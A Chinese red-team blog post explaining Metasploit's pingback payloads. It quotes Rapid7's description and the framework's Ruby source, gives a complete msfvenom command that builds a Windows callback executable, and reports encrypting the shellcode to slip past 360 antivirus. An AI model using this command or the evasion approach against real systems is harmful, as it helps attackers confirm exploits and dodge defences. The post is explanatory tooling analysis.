<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>MSF Pingback Payloads | Patrilic's blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">MSF Pingback Payloads</h1><a id="logo" href="/.">Patrilic's blog</a><p class="description">不忘初心</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/2019/04/01/Hello/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">MSF Pingback Payloads</h1><div class="post-meta">Sep 6, 2019<span> | </span><span class="category"><a href="/categories/Red-Team-Tricks/">Red-Team Tricks</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> 阅读</span></span></div><a class="disqus-comment-count" data-disqus-identifier="2019/09/06/Payloads/" href="/2019/09/06/Payloads/#disqus_thread"></a><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-pingback"><span class="toc-number">2.</span> <span class="toc-text">0x01 pingback</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-How-to-Use"><span class="toc-number">3.</span> <span class="toc-text">0x02 How to Use</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-总结"><span class="toc-number">4.</span> <span class="toc-text">0x03 总结</span></a></li></ol></div></div><div class="post-content"><p><a name="JSO7R"></a></p>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><blockquote>
<p>文章首发于先知社区，文章链接：<a href="https://xz.aliyun.com/t/6268" target="_blank" rel="noopener">https://xz.aliyun.com/t/6268</a></p>
</blockquote>
<p>今天早上Rapid7cn的公众号更新了一篇文章，然后就被群里的大师傅们转发了好几遍233，感觉挺有意思的，也想着分析一下</p>
<p><a href="https://mp.weixin.qq.com/s/ZI-qQ_ORKG_gJ2Wnc2PiRA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/ZI-qQ_ORKG_gJ2Wnc2PiRA</a></p>
<p>官网： <a href="https://blog.rapid7.com/2019/08/01/introducing-pingback-payloads/" target="_blank" rel="noopener">https://blog.rapid7.com/2019/08/01/introducing-pingback-payloads/</a><br><a name="mXsId"></a></p>
<h2 id="0x01-pingback"><a href="#0x01-pingback" class="headerlink" title="0x01 pingback"></a>0x01 pingback</h2><p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567694251815-6a249db8-4ac8-4a27-b999-49869d8138d5.png" alt="image.png">这次一共更新了10个pingback payload, 至于什么是pingback，其实msf官方在github已经说的很清楚了<br><a href="https://github.com/rapid7/metasploit-framework/pull/12129" target="_blank" rel="noopener">https://github.com/rapid7/metasploit-framework/pull/12129</a></p>
<blockquote>
<p>Pingback payloads are designed to provide a limited-functionality payload to verify an exploit has worked. <strong>It does not provide a shell of any kind.</strong> A pingback payload creates a “random” UUID value (separate from the payload UUID) that is written to the Metasploit database along with other data. When executed on target, the payload sends back that UUID to verify that the exploit worked, but nothing else. When Framework receives that UUID, we verify the target is vulnerable to the exploit without loading an interactive shell.<br>This prevents traditional [W/M]ITM attacks or someone sniffing the traffic for information, as the UUID itself means nothing to a listener, and without further execution, the session itself is not particularly valuable to an attacker.</p>
</blockquote>
<p>简单来说感觉其实就是，AV对msf之前的常规reverse_shell会进行拦截，导致我们并不能很清楚的知道目标是否存在该漏洞，然后这个payload就完全不会产生交互式shell，而只是返回一个UUID，能让我们知道poc/exp是否执行成功，然后目标是否存在当前漏洞，而不必担心被中间人攻击或者被拦截</p>
<p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567696662682-c96fa1cc-966d-4b06-b19e-2d52f8884ed3.png" alt="image.png"></p>
<h2 id="0x02-How-to-Use"><a href="#0x02-How-to-Use" class="headerlink" title="0x02 How to Use"></a>0x02 How to Use</h2><p>翻看代码，我们发现它其实是每次生成一个新的UUID，然后将其发送到目标中，然后调用listener中的payload设置一个监听，然后当程序进行 <code>Pingback</code> 时，MSF打开一个会话来接受UUID，最后拿到完整UUID后，就关闭当前session</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># msf/modules/payloads/singles/ruby/pingback_reverse_tcp.rb</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ruby_string</span></span></span><br><span class="line">    <span class="keyword">self</span>.pingback_uuid <span class="params">||</span>= <span class="keyword">self</span>.generate_pingback_uuid</span><br><span class="line">    lhost = datastore[<span class="string">'LHOST'</span>]</span><br><span class="line">    lhost = <span class="string">"[<span class="subst">#&#123;lhost&#125;</span>]"</span> <span class="keyword">if</span> Rex::Socket.is_ipv6?(lhost)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">"require'socket';"</span> \</span><br><span class="line">      <span class="string">"c=TCPSocket.new'<span class="subst">#&#123;lhost&#125;</span>',<span class="subst">#&#123;datastore[<span class="string">'LPORT'</span>].to_i&#125;</span>;"</span> \</span><br><span class="line">      <span class="string">"c.puts'<span class="subst">#&#123;[[<span class="keyword">self</span>.pingback_uuid].pack(<span class="string">'H*'</span>)].pack(<span class="string">'m0'</span>)&#125;</span>'.unpack('m0');"</span></span><br><span class="line">      <span class="string">"c.close"</span></span><br><span class="line">  <span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># msf/base/sessions/pingback.rb</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">uuid_read</span></span></span><br><span class="line">    uuid_raw = rstream.get_once(<span class="number">16</span>, <span class="number">1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span> <span class="keyword">unless</span> uuid_raw</span><br><span class="line">    <span class="keyword">self</span>.uuid_string = uuid_raw.each_byte.map &#123; <span class="params">|b|</span> <span class="string">"%02x"</span> % b.to_i() &#125;.join</span><br><span class="line">    print_status(<span class="string">"Incoming UUID = <span class="subst">#&#123;uuid_string&#125;</span>"</span>)</span><br><span class="line">    <span class="keyword">if</span> framework.db.active</span><br><span class="line">      <span class="keyword">begin</span></span><br><span class="line">        payload = framework.db.payloads(<span class="symbol">uuid:</span> uuid_string).first</span><br><span class="line">        <span class="keyword">if</span> payload.<span class="literal">nil</span>?</span><br><span class="line">          print_warning(<span class="string">"Provided UUID (<span class="subst">#&#123;uuid_string&#125;</span>) was not found in database!"</span>)</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">          print_good(<span class="string">"UUID identified (<span class="subst">#&#123;uuid_string&#125;</span>)"</span>)</span><br><span class="line">        <span class="keyword">end</span></span><br><span class="line">      <span class="keyword">rescue</span> ActiveRecord::ConnectionNotEstablished</span><br><span class="line">        print_status(<span class="string">"WARNING: UUID verification and logging is not available, because the database is not active."</span>)</span><br><span class="line">      <span class="keyword">rescue</span> =&gt; e</span><br><span class="line">        <span class="comment"># <span class="doctag">TODO:</span> Can we have a more specific exception handler?</span></span><br><span class="line">        <span class="comment"># Test: what if we send no bytes back?  What if we send less than 16 bytes?  Or more than?</span></span><br><span class="line">        elog(<span class="string">"Can't get original UUID"</span>)</span><br><span class="line">        elog(<span class="string">"Exception Class: <span class="subst">#&#123;e.<span class="keyword">class</span>.name&#125;</span>"</span>)</span><br><span class="line">        elog(<span class="string">"Exception Message: <span class="subst">#&#123;e.message&#125;</span>"</span>)</span><br><span class="line">        elog(<span class="string">"Exception Backtrace: <span class="subst">#&#123;e.backtrace&#125;</span>"</span>)</span><br><span class="line">      <span class="keyword">end</span></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      print_warning(<span class="string">"WARNING: UUID verification and logging is not available, because the database is not active."</span>)</span><br><span class="line">    <span class="keyword">end</span></span><br><span class="line">  <span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<p>然后在 <code>option.rb</code> 中，我们能看到pingback的模块存在两个选项：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span></span><br><span class="line">    register_advanced_options(</span><br><span class="line">      [</span><br><span class="line">        Msf::OptInt.new(<span class="string">'PingbackRetries'</span>, [<span class="literal">true</span>, <span class="string">"How many additional successful pingbacks"</span>, <span class="number">0</span>]),</span><br><span class="line">        Msf::OptInt.new(<span class="string">'PingbackSleep'</span>, [<span class="literal">true</span>, <span class="string">"Time (in seconds) to sleep between pingbacks"</span>, <span class="number">30</span>])</span><br><span class="line">      ], <span class="keyword">self</span>.<span class="keyword">class</span>)</span><br><span class="line">  <span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<ul>
<li>PingbackRetries  - pingback的次数</li>
<li>PingbackSleep - pinigback的时间间隔</li>
</ul>
<p>我们利用 <code>Msfvenom</code> 生成一个 <code>windows/x64/pingback_reverse_tcp</code> 的exe木马</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/pingback_reverse_tcp -f exe -o patrilic.exe LHOST=<span class="number">192.168</span>.<span class="number">1.107</span> LPORT=<span class="number">4445</span> EXITFUNC=thread PINGBACKRETRIES=<span class="number">10</span> PINGBACKSLEEP=<span class="number">5</span></span><br></pre></td></tr></table></figure>
<p>然后在目标机器上执行时：</p>
<p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567698698752-8e60bbfb-8134-4cae-a909-80499d4ab5c2.png" alt="image.png"><br>只会返回UUID<br><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567698945771-f65f647a-3285-42e1-863e-29555f64cca5.png" alt="image.png"></p>
<p>然后目标机器上并没有产生任何的交互式shell，同时使用 <code>Wireshark</code> 也只能捕获到16byte的UUID值</p>
<p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567699063357-40b97628-fdfa-4c67-951a-546ce62b1f6e.png" alt="image.png"></p>
<h2 id="0x03-总结"><a href="#0x03-总结" class="headerlink" title="0x03 总结"></a>0x03 总结</h2><p>这次更新的pingback payload，已经感觉是最小化的攻击载荷了，而且特征也并不明显，只是一串随机的UUID值而已，感觉用来验证漏洞还是挺不错的，然后后面再办法去掉exp特征，使用另外的方式来获得交互式shell或者直接执行命令云云.. 当然，msf直接生成的程序特征还是挺明显的，还是需要进行免杀，不过由于这个payload并没有进行起敏感进程，所以还是比较好免杀的。</p>
<p>shellcode随便加密搞了下，静态还行，但是动态估计也没啥2333毕竟也没有危险进程，只是开了个socket</p>
<p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567701851264-0e1de3de-9aec-49dd-99cc-278ba2685e22.png#align=left&amp;display=inline&amp;height=937&amp;name=image.png&amp;originHeight=1874&amp;originWidth=3358&amp;size=497343&amp;status=done&amp;width=1679" alt="image.png"></p>
<p>然后进程开起来的话，找了个360的机子试了下，没啥问题</p>
<p><img src="https://cdn.nlark.com/yuque/0/2019/png/258139/1567701981644-609e99b8-e943-4859-96fb-00c8d6ffa46e.png" alt="image1.png"></p>
<p>不过特征估计也快普及了，感觉思路挺好的，学习了～</p>
</div><div class="tags"><a href="/tags/metasploit/">metasploit</a></div><div class="post-nav"><a class="pre" href="/2019/09/09/CVE-2019-0708 RDP 远程代码执行/">CVE-2019-0708 RDP 远程代码执行</a><a class="next" href="/2019/08/29/Windows10 BypassUAC with WSReset.exe/">Windows10 BypassUAC with WSReset.exe</a></div><div id="disqus_thread"><div class="btn_click_load"><button class="disqus_click_btn">阅读评论（请确保 Disqus 可以正常加载）</button></div><script type="text/javascript">var disqus_config = function () {
    this.page.url = 'http://patrilic.top/2019/09/06/Payloads/';
    this.page.identifier = '2019/09/06/Payloads/';
    this.page.title = 'MSF Pingback Payloads';
  };</script><script type="text/javascript" id="disqus-lazy-load-script">$.ajax({
url: 'https://disqus.com/next/config.json',
timeout: 2500,
type: 'GET',
success: function(){
  var d = document;
  var s = d.createElement('script');
  s.src = '//Patrilic.disqus.com/embed.js';
  s.setAttribute('data-timestamp', + new Date());
  (d.head || d.body).appendChild(s);
  $('.disqus_click_btn').css('display', 'none');
},
error: function() {
  $('.disqus_click_btn').css('display', 'block');
}
});</script><script type="text/javascript" id="disqus-click-load">$('.btn_click_load').click(() => {  //click to load comments
    (() => { // DON'T EDIT BELOW THIS LINE
        var d = document;
        var s = d.createElement('script');
        s.src = '//Patrilic.disqus.com/embed.js';
        s.setAttribute('data-timestamp', + new Date());
        (d.head || d.body).appendChild(s);
    })();
    $('.disqus_click_btn').css('display','none');
});</script><script type="text/javascript" id="disqus-count-script">$(function() {
     var xhr = new XMLHttpRequest();
     xhr.open('GET', '//disqus.com/next/config.json', true);
     xhr.timeout = 2500;
     xhr.onreadystatechange = function () {
       if (xhr.readyState === 4 && xhr.status === 200) {
         $('.post-meta .post-comments-count').show();
         var s = document.createElement('script');
         s.id = 'dsq-count-scr';
         s.src = 'https://Patrilic.disqus.com/count.js';
         s.async = true;
         (document.head || document.body).appendChild(s);
       }
     };
     xhr.ontimeout = function () { xhr.abort(); };
     xhr.send(null);
   });
</script></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="http://patrilic.top"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/ATT-CK/">ATT&CK</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/BypassUac/">BypassUac</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Diary/">Diary</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Red-Team-Tricks/">Red-Team Tricks</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQLi-Tricks/">SQLi Tricks</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Skills/">Skills</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Threat-Intelligence/">Threat Intelligence</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Write-up/">Write-up</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a><span class="category-list-count">8</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/metasploit/" style="font-size: 15px;">metasploit</a> <a href="/tags/BlueKeep/" style="font-size: 15px;">BlueKeep</a> <a href="/tags/Windows提权/" style="font-size: 15px;">Windows提权</a> <a href="/tags/DLL-Hijacking/" style="font-size: 15px;">DLL Hijacking</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/Backdoor/" style="font-size: 15px;">Backdoor</a> <a href="/tags/代码审计/" style="font-size: 15px;">代码审计</a> <a href="/tags/n1ctf-pentest/" style="font-size: 15px;">n1ctf-pentest</a> <a href="/tags/Forcepoint-VPN/" style="font-size: 15px;">Forcepoint VPN</a> <a href="/tags/SQL注入/" style="font-size: 15px;">SQL注入</a> <a href="/tags/内网渗透/" style="font-size: 15px;">内网渗透</a> <a href="/tags/proc/" style="font-size: 15px;">proc</a> <a href="/tags/Struts2/" style="font-size: 15px;">Struts2</a> <a href="/tags/威胁情报/" style="font-size: 15px;">威胁情报</a> <a href="/tags/Git/" style="font-size: 15px;">Git</a> <a href="/tags/文件上传/" style="font-size: 15px;">文件上传</a> <a href="/tags/命令执行/" style="font-size: 15px;">命令执行</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://balis0ng.com" title="balis0ng" target="_blank">balis0ng</a><ul></ul><a href="https://evi1cg.me/" title="evi1cg's Blog" target="_blank">evi1cg's Blog</a><ul></ul><a href="http://hpdoger.cn" title="Hpdoger" target="_blank">Hpdoger</a><ul></ul><a href="http://0day.design" title="Passer6y" target="_blank">Passer6y</a><ul></ul><a href="http://adm1n.design" title="Hu3sky" target="_blank">Hu3sky</a><ul></ul><a href="http://0xa1paca.top" title="0xa1paca" target="_blank">0xa1paca</a><ul></ul><a href="http://noel.xin/" title="Noel's Blog" target="_blank">Noel's Blog</a><ul></ul><a href="https://www.0akarma.com" title="0aKarmA" target="_blank">0aKarmA</a><ul></ul><a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a><ul></ul><a href="https://www.kingkk.com/" title="Kingkk's Blog" target="_blank">Kingkk's Blog</a><ul></ul><a href="http://blog.leanote.com/snowming" title="Snowming" target="_blank">Snowming</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">Patrilic's blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body></html>